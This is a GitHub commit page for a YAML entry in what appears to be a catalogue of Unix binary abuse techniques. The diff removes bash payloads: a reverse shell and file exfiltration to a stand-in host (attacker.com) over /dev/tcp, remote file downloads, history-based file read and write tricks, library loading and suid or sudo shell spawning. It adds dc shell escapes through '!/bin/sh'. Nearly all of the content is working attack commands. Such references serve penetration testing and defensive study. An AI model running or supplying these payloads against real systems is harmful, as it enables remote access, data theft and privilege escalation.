-
Notifications
You must be signed in to change notification settings - Fork 1.4k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
As initially suggested by #397.
- Loading branch information
Showing
1 changed file
with
4 additions
and
62 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,67 +1,9 @@ | ||
| --- | ||
| functions: | ||
| shell: | ||
| - code: bash | ||
| reverse-shell: | ||
| - description: Run `nc -l -p 12345` on the attacker box to receive the shell. | ||
| code: | | ||
| export RHOST=attacker.com | ||
| export RPORT=12345 | ||
| bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1' | ||
| file-upload: | ||
| - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. | ||
| code: | | ||
| export RHOST=attacker.com | ||
| export RPORT=12345 | ||
| export LFILE=file_to_send | ||
| bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' | ||
| - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. | ||
| code: | | ||
| export RHOST=attacker.com | ||
| export RPORT=12345 | ||
| export LFILE=file_to_send | ||
| bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' | ||
| file-download: | ||
| - description: Fetch a remote file via HTTP GET request. | ||
| code: | | ||
| export RHOST=attacker.com | ||
| export RPORT=12345 | ||
| export LFILE=file_to_get | ||
| bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ | ||
| 3<>/dev/tcp/$RHOST/$RPORT \ | ||
| | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | ||
| - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. | ||
| code: | | ||
| export RHOST=attacker.com | ||
| export RPORT=12345 | ||
| export LFILE=file_to_get | ||
| bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' | ||
| file-write: | ||
| - code: | | ||
| export LFILE=file_to_write | ||
| bash -c 'echo DATA > $LFILE' | ||
| - description: This adds timestamps to the output file. | ||
| code: | | ||
| LFILE=file_to_write | ||
| HISTIGNORE='history *' | ||
| history -c | ||
| DATA | ||
| history -w $LFILE | ||
| file-read: | ||
| - description: It trims trailing newlines and it's not binary-safe. | ||
| code: | | ||
| export LFILE=file_to_read | ||
| bash -c 'echo "$(<$LFILE)"' | ||
| - description: The read file content is surrounded by the current history content. | ||
| code: | | ||
| LFILE=file_to_read | ||
| HISTTIMEFORMAT=$'\r\e[K' | ||
| history -r $LFILE | ||
| history | ||
| library-load: | ||
| - code: bash -c 'enable -f ./lib.so x' | ||
| suid: | ||
| - code: "./bash -p" | ||
| - code: dc -e '!/bin/sh' | ||
| sudo: | ||
| - code: sudo bash | ||
| - code: sudo dc -e '!/bin/sh' | ||
| limited-suid: | ||
| - code: ./dc -e '!/bin/sh' | ||
| --- |